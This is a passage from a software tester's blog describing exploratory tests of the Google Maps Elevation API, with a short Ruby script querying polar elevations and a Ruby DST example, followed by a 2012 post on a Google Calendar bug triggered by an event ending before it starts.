You can see the outline of the Isle, and even what I suspected were a couple of erroneous data points. Closer examination suggests that these are in fact likely to be correct, as they correspond to channels and bays that are open to the sea. Although this exercise had yet to highlight any issues, it performed a useful function nonetheless. It let me compare my results against another map visually, checking that I was grabbing and plotting the data at least superficially correctly. I had not, for example, confused latitude with longitude.

I did notice one thing that was not expected in the resulting map. The cloud of points seemed to lack any obvious distortion compared with other maps I found online. It seemed too good, especially as I had not used any correction for the map projection. I had taken the 3-dimensional lat and long values and 'flat' projected them - and the result still looked OK.

This illustrates how testing is not so much about finding bugs, but rather about finding information and asking questions. We then use that information to help find more information through more testing. I now suspected the data was set to use a projection that works well at European latitudes, e.g. Mercator, or used some other system to make things look 'right' to me. How might this manifest itself elsewhere in the API's responses? (Google's documentation has more info on the projections used etc.)

Thinking back to the 3-dimensional nature of the data, I knew that a point on the globe can be represented by multiple sets of co-ordinates [if we use latitude & longitude]. A good example is the North Pole. This has a latitude of 90 degrees, but can have any valid longitude. I tried various co-ordinates for the North Pole, and each returned a different elevation. That's interesting; my client might be planning to use the system for fairly northern latitudes - will the data be accurate enough? If elevation is unreliable around the pole, at what latitude will it be 'good enough'? What if our product owners want more information about just how variable the elevation at the pole is? Or what the elevation is at the South Pole? Those are pretty simple modifications to my short script. (Wikipedia has some interesting comments about Google Maps near the poles.)
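That check is a trivial change to the script; here's a sketch of asking for the 'same' pole under several longitudes (same public endpoint as before):

require 'net/http'
require 'uri'
require 'json'

# Latitude 90 is the North Pole whatever the longitude, so these should
# arguably all return the same elevation.
[-180, -90, 0, 90, 180].each do |lng|
  uri  = URI("http://maps.googleapis.com/maps/api/elevation/json?locations=90,#{lng}&sensor=false")
  data = JSON.parse(Net::HTTP.get(uri))
  puts "longitude #{lng}: #{data['results'].first['elevation']}" if data['status'] == 'OK'
end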

The simple automation used in this example, combined with human interpretation, used relatively little expensive 'human' time and yet maximised the return from automation. Many 'automation solutions' are quite the reverse, requiring extensive development, maintenance and babysitting. They typically require specialised environments and machine estates to be created and maintained by [expensive] people. This is far from actually being automated; the man-hours required to keep them running, to interpret the results and to rerun the ambiguous failures are often substantial.

The exploratory investigation outlined here greatly improves on the coverage a lone human tester can achieve, and yet is lightweight and simple. The scripts are short and easily understood by testers new to the team. They are written in commonly used languages and can be understood quickly by programmers and system administrators alike. My client won't be locked into using "the only guy that can keep those tests running!", and they can free their staff to work on the product - the product that makes money.

Monday, 19 March 2012

A simple test of time.

Last week I was performing another of my 5 minute testing exercises. As posted before, if I get a spare few minutes I pick something and investigate. This time, I'd picked Google Calendar.

One thing people use calendars for is logging what they have done. That is, they function as both schedulers and record keepers. You add what you planned to do, and they also serve as a record of what you did - useful for invoicing clients or just reviewing how you used your time.

Calendars and software based on them are inherently difficult to program and as such are often a rich source of bugs. People make a lot of assumptions about time and dates. For example that something ends after it starts.

That may sound like something that 'just is true', but there are a number of reasons why that might not be the case. Some examples are:
  • You type in the dates the wrong way round (or mix up your ISO and US dates etc)
  • You're working with times around a DST switch, when 30 minutes after 0130h might be 0100h (see the sketch after this list).
  • The system clock decides to correct itself, abruptly, in the middle of an action (A poorly implemented NTP setup could do this)
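You can see that DST oddity for yourself with a couple of lines of Ruby - a sketch that assumes a Unix-like system with the tz database available (the date is the UK's autumn 2013 clock change; adjust zone and year to taste):

ENV['TZ'] = 'Europe/London'                        # assumes the OS tz database is present

before = Time.utc(2013, 10, 27, 0, 50).getlocal    # 01:50 BST, ten minutes before the clocks go back
after  = before + (30 * 60)                        # 30 real minutes later

puts before   # => 2013-10-27 01:50:00 +0100
puts after    # => 2013-10-27 01:20:00 +0000  (later in time, but "earlier" on the wall clock)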
Google Calendar is widely used, and has been available for some time, but I suspected bugs could still be uncovered quickly.


I opened Google Calendar, picked a time that day and added an item: Stuff i did. You can see it above in light-blue.


I then clicked on the item, and edited the date. But, butter fingers here, I typed in the wrong year. Not only that, I typed only the year in. So now we get to see how Google Calendar handles an event ending before it begins.



Google Calendar appears to have deleted the date. OK, maybe it's just deleting what [it assumes] is obviously wrong. But why the hour glass? What was Google's code doing for so long?


A few moments later, after not being able to click on anything else in Google Calendar, I'm greeted with this:



OK, so if I click yes, that's good, right? Otherwise won't I be disabling the Calendar code? A few moments later... the window goes blank...




A little later, the page reappears and you get another chance, and the Calendar starts to give you better warnings. But nonetheless, that wasn't a good user experience, and it's certainly a bug.

These are simple-to-catch bugs, so I'm often left wondering why they are so often present in widely used software that probably had considerable money expended on its development. This bug is quite repeatable and present across different browsers and operating systems. All it took was a little investigation.